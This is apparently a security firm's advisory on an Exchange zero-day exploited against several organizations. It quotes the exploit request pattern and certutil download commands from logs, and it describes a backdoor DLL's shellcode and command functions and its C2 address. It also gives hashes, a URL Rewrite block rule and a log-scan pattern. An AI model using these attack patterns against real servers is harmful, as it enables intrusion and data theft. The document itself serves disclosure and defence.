Circa the beginning of August 2022, while doing security monitoring & incident response services, GTSC SOC team discovered that a critical infrastructure was being attacked, specifically to their Microsoft Exchange application. During the investigation, GTSC Blue Team experts determined that the attack utilized an unpublished Exchange security vulnerability, i.e., a 0-day vulnerability, thus immediately came up with a temporary containment plan. At the same time, Red Team experts started researching and debugging Exchange de-compiled code to find the vulnerability and exploit code. Thanks to experience finding the previous 1-day Exchange exploit, the RedTeam has a great understanding of Exchange’s code flows and processing mechanisms, therefore research time was reduced, and the vulnerability was uncovered quickly. The vulnerability turns out to be so critical that it allows the attacker to do RCE on the compromised system. GTSC submitted the vulnerability to the Zero Day Initiative (ZDI) right away to work with Microsoft so that a patch could be prepared as soon as possible. ZDI verified and acknowledged 2 bugs, whose CVSS scores are 8.8 and 6.3, concerning the exploit as follows.

However up to now, GTSC has seen other customers also experiencing the similar problem. After careful testing, we confirmed that those systems were being attacked using this 0-day vulnerability. To help the community temporarily stop the attack before an official patch from Microsoft is available, we publish this article aiming to those organizations who are using Microsoft Exchange email system.
– While providing SOC service to a customer, GTSC Blueteam detected exploit requests in IIS logs with the same format as ProxyShell vulnerability: autodiscover/[email protected]/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%[email protected]. Also checking other logs, we saw that the attacker can execute commands on the attacked system. The version number of these Exchange servers showed that the latest update had already installed, so an exploitation using Proxyshell vulnerability was impossible -> Blueteam analysts can confirm that it was a new 0-day RCE vulnerability. This information was sent to Redteam, and GTSC’s Redteam members conducted research to answer these questions: Why were the exploit requests similar to those of ProxyShell bug? How is the RCE implemented?
– GTSC Redteam successfully figured out how to use the above path to access a component in the Exchange backend and perform RCE. However at this time, we would like NOT to release technical details of the vulnerability yet.
After successfully mastering the exploit, we recorded attacks to collect information and create a foothold in the victim’s system. The attack team also used various techniques to create backdoors on the affected system and perform lateral movements to other servers in the system.
We detected webshells, mostly obfuscated, being dropped to Exchange servers. Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management.
<%@Page Language=”Jscript”%>
We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese.
Another notable feature is that the hacker also changes the content of the file RedirSuiteServiceProxy.aspx to webshell content. RedirSuiteServiceProxy.aspx is a legitimate file name available in the Exchange server.
FileName | Path |
RedirSuiteServiceProxy.aspx | C:ProgramFilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth |
Xml.ashx | C:inetpubwwwrootaspnet_client |
pxh4HG1v.ashx | C:ProgramFilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth |

During the incident response process at another customer, GTSC noted that the attack team used another webshell template
Filename: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Command Execution
Besides collecting information on the system, the attacker downloads files, and checks connections through certutil, which is a legitimate tool available in the Windows environment.
“cmd” /c cd /d “c:PerfLogs”&certutil.exe -urlcache -split -f c:perflogst&echo [S]&cd&echo [E]
“cmd” /c cd /d “c:PerfLogs”&certutil.exe -urlcache -split -f c:test&echo [S]&cd&echo [E]
It should be noted that every command ends with the string echo [S]&cd&echo [E], which is one of the signatures of the Chinese Chopper.
In addition, the hacker also injects malicious DLLs into the memory, drops suspicious files on the attacked servers, and executes these files through WMIC.
Suspicious File
On the servers, we detected suspicious files of exe and dll formats
FileName | Path |
DrSDKCaller.exe | C:rootDrSDKCaller.exe |
all.exe | C:UsersPublicall.exe |
dump.dll | C:UsersPublicdump.dll |
ad.exe | C:UsersPublicad.exe |
gpg-error.exe | C:PerfLogsgpg-error.exe |
cm.exe | C:PerfLogscm.exe |
msado32.tlb | C:Program FilesCommon Filessystemadomsado32.tlb |
Among the suspect files, based on the commands executed on the server, we determined that all.exe and dump.dll are responsible for credentials dumping on the server system. After that, the attacker uses rar.exe to compress dumped files and copy them to the webroot of the Exchange server. Unfortunately, during the response process, the above files no longer exist on the compromised system, possibly due to the hacker’s evidence deletion.
The cm.exe file that is dropped into the C:PerfLogs folder is the standard Windows command line tool cmd.exe.
DLL information
File name: Dll.dll
DLL analysis
GTSC analyzes a specific sample (074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82) to describe the behavior of the malicious code, other DLL samples have the similar tasks and behaviors, differing only in listener configuration.
The DLL consists of two classes: Run and m, each of which calls to methods that perform different tasks. Specifically:
The Run class creates a listener that listens for connections to port 443 at the path https://*:443/ews/web/webconfig/.

After listening, the malware creates a new thread that calls to r. Method r does:
– Check whether the received request has data in the body or not, if not then returns result 404.
– Conversely, if the request includes data, the DLL continues to process the stream inside the IF branch:
Check if the received request includes “RPDbgEsJF9o8S=” or not. If yes, call method i in class m to handle received request. Results returned from Run.m.i will be coverted to a base64 string. Results returned to the client in the following format

Class m
Method i does:
– Decrypt the request received using AES algorithm where the first 16 bytes of the request are the IV value, the next 16 bytes are the key value, the rest are the data.
– After decoding, get the first element in the array as a flag to handle the defined cases as follows:

o Case 0: Call to method info. This method is responsible for collecting system information. Information such as operating system architecture, framework version, operating system version, etc. GTSC simulates case 0 with the image below. The request is sent in a format that the first 16 bytes are the IV value, the next 16 bytes are the key value, followed by a flag to specify the option, and the rest is data.
base64 (IV | key | aes(flag|data))

o Case 1: Calls to method sc, which is responsible for allocating memory to implment the shellcode

o Case 2: Call to two methods p and r. Method p handles data separated by the “|” character, save to array array3. The array array3 will take the first 2 elements as parameters for method r, which is responsible for executing the command

o Case 3: Call to method ld, which is responsible for listing directory and file information in the format
D|-|<Date created> |<Date modified> |<folder or file name>

o Case 4: Call to method wf, which is responsible for writing files

o Case 5: Call to method rf, which is responsible for reading files

o Case 6: Create a folder
o Case 7: Delete file or folder
o Case 8: Moving file
o Case 9: Set time for a file

o Case 10: Load and execute C# bytecode received from request.

The other DLL samples have similar tasks, and are only different in listener configurations as follows:
Victim 1:
Victim 2:
GTSC also detected that the DLL was injected into the memory of the svchost.exe process. The DLL makes a connection to send and receive data to the address 137[.]184[.]67[.]33 that is fixed in the binary. Sending and receiving data with C2 using the RC4 encryption algorithm where the key will be generated at runtime.

GTSC’s direct incident response process recorded more than 1 organizations being the victims of an attack campaign exploiting this 0-day vulnerability. In addition, we are also concerned that there may be many other organizations that have been exploited but have not been discovered. While waiting for the official patch from the company, GTSC provides a temporary remedy to reduce the vulnerability of attacks by adding a rule to block requests with indicators of attack through the URL Rewrite Rule module on IIS server.
– In Autodiscover at FrontEnd select tab URL Rewrite, select Request Blocking

– Add string “.*autodiscover.json.*@.*Powershell.*“ to the URL Path:

– Condition input: Choose {REQUEST_URI}

We recommend all organizations/enterprises around the world that are using Microsoft Exchange Server to check, review, and apply the above temporary remedy as soon as possible to avoid potential serious damages.
To help organizations check if their Exchange Servers have been exploited by this bug yet, GTSC have released guideline and a tool to scan IIS log files (stored by default in the %SystemDrive%inetpublogsLogFiles folder ):
Method 1: Use powershell command:
Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter “*.log” | Select-String -Pattern ‘powershell.*autodiscover.json.*@.*200
Method 2: Use the tool developed by GTSC: Based on the exploit signature, we build a tool to search with much shorter time needed than using powershell. The link to download:
File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthpxh4HG1v.ashx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthRedirSuiteServiceProxy.aspx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthRedirSuiteServiceProxy.aspx
File Name: Xml.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: Xml.ashx
Filename: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherrorEE.aspx
File name: Dll.dll
File name: 180000000.dll (Dump từ tiến trình Svchost.exe)
SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e
Tatic | ID | Name |
Resource Development | T1586.002 | Compromise Accounts: Email Accounts |
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
Execution | T1047 | Windows Management Instrumentation |
Persistence | T1505.003 | Server Software Component: Web Shell |
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion |
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location |
Defense Evasion | T1620 | Reflective Code Loading |
Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory |
Discovery | T1087 | Account Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1057 | Process Discovery |
Discovery | T1049 | System Network Connections Discovery |
Lateral Movement | T1570 | Lateral Tool Transfer |
Collection | T1560.001 | Archive Collected Data: Archive via Utility |